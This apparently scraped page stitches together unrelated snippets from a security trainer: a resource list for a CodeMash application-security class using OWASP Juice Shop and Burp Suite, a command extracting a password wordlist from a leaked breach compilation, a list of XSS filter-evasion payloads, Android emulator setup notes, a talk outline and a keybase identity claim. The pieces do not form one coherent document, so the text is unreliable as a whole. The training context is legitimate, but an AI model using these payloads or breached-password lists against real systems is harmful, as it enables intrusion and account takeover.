This is a link aggregation for things discussed at Bill's 2024 Developing Kids CodeMash talk
At CodeMash 2.0.2.0 we covered a lot of topics in Application Security. Can't share my slides (we didn't use many anyway) but I can make a list of resources based on what we talked about. Many of these are OWASP links, and OWASP is transitioning from MediaWiki to GitHub, so it might take a little work over time to find the resource. That said, let's do what we can.
The class started by talking about the OWASP Security Principles. https://wiki.owasp.org/index.php/OWASP_Security_Principles_Project
Then we dove into vulnerability assessment. Our target? OWASP Juice Shop. https://github.com/bkimminich/juice-shop
The browser most used was FireFox. https://www.mozilla.org/en-US/firefox/
And between those we used an attack proxy. For this class we used Burp Suite Community Edition. https://portswigger.net/burp
wordlist created from original 41G stash via: | |
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt | |
Then, compressed with: | |
7z a breachcompilation.txt.7z breachcompilation.txt | |
Size: |
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
Get Genymotion from https://www.genymotion.com/ | |
Pay for it. For crying out loud. | |
OK, now set up a device one version of Android behind, and using a Google image. | |
Start it. | |
Click OK on the AAPT not found. | |
After it boots, we need the Google apps. What you thought Android was open source? HAHAHAHAHAHA. | |
First, we need ARM translation. | |
Search for "genymotion arm translation download" and pick the least eggregious download site. Make sure you are wearing a digital condom. | |
Now the apps. | |
Open http://opengapps.org/ |
What I'm talking about | |
• Intro | |
• Mobile Top 10 | |
• Set up a test Gmail account | |
• Connect it to Facebook, Twitter, Linkedin if you can. | |
Local test environment | |
• Genymotion | |
○ Required VirtualBox |
I hereby claim:
- I am sempf on github.
- I am sempf (https://keybase.io/sempf) on keybase.
- I have a public key whose fingerprint is 47A9 74E1 8C28 B419 A092 791F A628 D30E 5565 EC89
To claim this, I am signing this object: